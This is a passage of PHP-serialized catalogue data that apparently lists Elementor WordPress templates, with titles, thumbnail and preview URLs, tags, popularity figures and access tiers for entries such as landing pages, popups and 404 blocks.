eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/camera_sale_featured-img.jpg\";s:12:\"tmpl_created\";i:1618396388;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/camera-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Camera\",\"Ecommerce\",\"Landing Pages\",\"Photography\",\"Sale\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:873;s:11:\"trend_index\";i:535;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:227;a:21:{s:4:\"tmpl\";i:951;s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:734;s:11:\"trend_index\";i:686;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:228;a:21:{s:4:\"tmpl\";i:1222;s:2:\"id\";i:20960;s:5:\"title\";s:26:\"Travel Agency – Home\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/5-Home-Travel-Agency.jpg\";s:12:\"tmpl_created\";i:1638788432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/travel-agency-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Adventures\",\"Experience\",\"Explore\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:229;a:21:{s:4:\"tmpl\";i:1196;s:2:\"id\";i:18815;s:5:\"title\";s:25:\"Car Wash – Business\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Car-Wash.png\";s:12:\"tmpl_created\";i:1621336431;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/car-wash-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:45:\"[\"Business\",\"car\",\"Discount\",\"Landing Pages\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:230;a:21:{s:4:\"tmpl\";i:1242;s:2:\"id\";i:21473;s:5:\"title\";s:40:\"Architecture Photography – Gallery\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/20-Gallery-Architecture-Photography.jpg\";s:12:\"tmpl_created\";i:1638822115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/architecture-photography-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:52:\"[\"Architecture\",\"Gallery\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:231;a:21:{s:4:\"tmpl\";i:1015;s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:650;s:11:\"trend_index\";i:565;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:232;a:21:{s:4:\"tmpl\";i:923;s:2:\"id\";i:12229;s:5:\"title\";s:33:\"Slide In | Law Firm | Information\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/popup.png\";s:12:\"tmpl_created\";i:1572847842;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-law-firm-information/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:413;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:233;a:21:{s:4:\"tmpl\";i:1198;s:2:\"id\";i:18824;s:5:\"title\";s:33:\"Design School – Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1621336756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:234;a:21:{s:4:\"tmpl\";i:1236;s:2:\"id\";i:21259;s:5:\"title\";s:28:\"3D Designer – Projects\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/24-Projects-3D-Designer.jpg\";s:12:\"tmpl_created\";i:1638819185;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/3d-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"3D\",\"Creative Portfolio\",\"Design\",\"Designer\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:235;a:21:{s:4:\"tmpl\";i:1028;s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:559;s:11:\"trend_index\";i:284;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:236;a:21:{s:4:\"tmpl\";i:1197;s:2:\"id\";i:18819;s:5:\"title\";s:27:\"Dog Walker – Business\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Dog-Walker.png\";s:12:\"tmpl_created\";i:1621336601;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/dog-walker-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:41:\"[\"Business\",\"Dog\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:237;a:21:{s:4:\"tmpl\";i:1238;s:2:\"id\";i:21349;s:5:\"title\";s:29:\"Architecture – Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/23-Projects-Architecture.jpg\";s:12:\"tmpl_created\";i:1638820870;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/architecture-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:70:\"[\"Architecture\",\"Creative\",\"Creative Portfolio\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:238;a:21:{s:4:\"tmpl\";i:1034;s:2:\"id\";i:15075;s:5:\"title\";s:34:\"Slide-In | Menu | Flooring Company\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp-1.png\";s:12:\"tmpl_created\";i:1597739605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/slide-in-menu-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:383;s:11:\"trend_index\";i:162;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:239;a:21:{s:4:\"tmpl\";i:1414;s:2:\"id\";i:24079;s:5:\"title\";s:32:\"Fashion Shop – Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Fashion-Shop.jpg\";s:12:\"tmpl_created\";i:1650988089;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/fashion-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Aesthetic\",\"Business\",\"Coming Soon\",\"Ecommerce\",\"Girly\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:240;a:21:{s:4:\"tmpl\";i:1195;s:2:\"id\";i:18761;s:5:\"title\";s:33:\"Fashion Store – Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Fashion-Store.png\";s:12:\"tmpl_created\";i:1621336146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/fashion-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:56:\"[\"Coming Soon\",\"Fashion\",\"Landing Pages\",\"Shop\",\"store\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:241;a:21:{s:4:\"tmpl\";i:1153;s:2:\"id\";i:17060;s:5:\"title\";s:36:\"Private Tutor – Online Service\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Tutor-2.png\";s:12:\"tmpl_created\";i:1610631042;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/private-tutor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:64:\"[\"Education\",\"Landing Pages\",\"Online Service\",\"Teacher\",\"Tutor\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:780;s:11:\"trend_index\";i:628;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:242;a:21:{s:4:\"tmpl\";i:1430;s:2:\"id\";i:24434;s:5:\"title\";s:25:\"Wireframe – About 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-3.jpg\";s:12:\"tmpl_created\";i:1653988697;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:76:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:243;a:21:{s:4:\"tmpl\";i:1158;s:2:\"id\";i:17232;s:5:\"title\";s:33:\"Life Coach – Online Service\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Life-Coach.png\";s:12:\"tmpl_created\";i:1610902793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/life-coach-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:38:\"[\"Coach\",\"Landing Pages\",\"Life Coach\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:787;s:11:\"trend_index\";i:751;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:244;a:21:{s:4:\"tmpl\";i:1436;s:2:\"id\";i:24515;s:5:\"title\";s:28:\"Wireframe – Services 3\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3.jpg\";s:12:\"tmpl_created\";i:1653988946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:66:\"[\"Business\",\"Contact\",\"Footer\",\"Header\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:245;a:21:{s:4:\"tmpl\";i:875;s:2:\"id\";i:11241;s:5:\"title\";s:36:\"Classic | Digital Agency | Marketing\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/PopUp_small.jpg\";s:12:\"tmpl_created\";i:1564643043;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-digital-agency-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:362;s:11:\"trend_index\";i:315;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:246;a:21:{s:4:\"tmpl\";i:1146;s:2:\"id\";i:16932;s:5:\"title\";s:35:\"Finance Consulting – Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Finance-Consulting.png\";s:12:\"tmpl_created\";i:1610532170;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/lp/finance-consulting-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:80:\"[\"Advisor\",\"Business\",\"Consulting\",\"Finance\",\"Investment\",\"Landing Pages\",\"Tax\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:790;s:11:\"trend_index\";i:630;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:247;a:21:{s:4:\"tmpl\";i:1429;s:2:\"id\";i:24421;s:5:\"title\";s:25:\"Wireframe – About 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-2.jpg\";s:12:\"tmpl_created\";i:1653988579;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:248;a:21:{s:4:\"tmpl\";i:674;s:2:\"id\";i:8505;s:5:\"title\";s:11:\"404 page 01\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/001.jpg\";s:12:\"tmpl_created\";i:1526415501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:222;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:249;a:21:{s:4:\"tmpl\";i:1136;s:2:\"id\";i:16721;s:5:\"title\";s:35:\"Dental – Health & Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Dental.jpg\";s:12:\"tmpl_created\";i:1610448567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/dental-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:44:\"[\"Dental\",\"Doctor\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:801;s:11:\"trend_index\";i:655;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:250;a:21:{s:4:\"tmpl\";i:1417;s:2:\"id\";i:24116;s:5:\"title\";s:32:\"Tech Company – Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Tech-Company.jpg\";s:12:\"tmpl_created\";i:1650989265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/tech-company-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"Business\",\"Coding\",\"Coming Soon\",\"Computer\",\"Developer\",\"IT\",\"Services\",\"Technology\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:251;a:21:{s:4:\"tmpl\";i:675;s:2:\"id\";i:8511;s:5:\"title\";s:11:\"404 page 02\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/002.jpg\";s:12:\"tmpl_created\";i:1526415528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:347;s:11:\"trend_index\";i:155;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:252;a:21:{s:4:\"tmpl\";i:1161;s:2:\"id\";i:17269;s:5:\"title\";s:34:\"Electronics Sale – eCommerce\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Electronic-Products.png\";s:12:\"tmpl_created\";i:1610903298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/electronics-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing 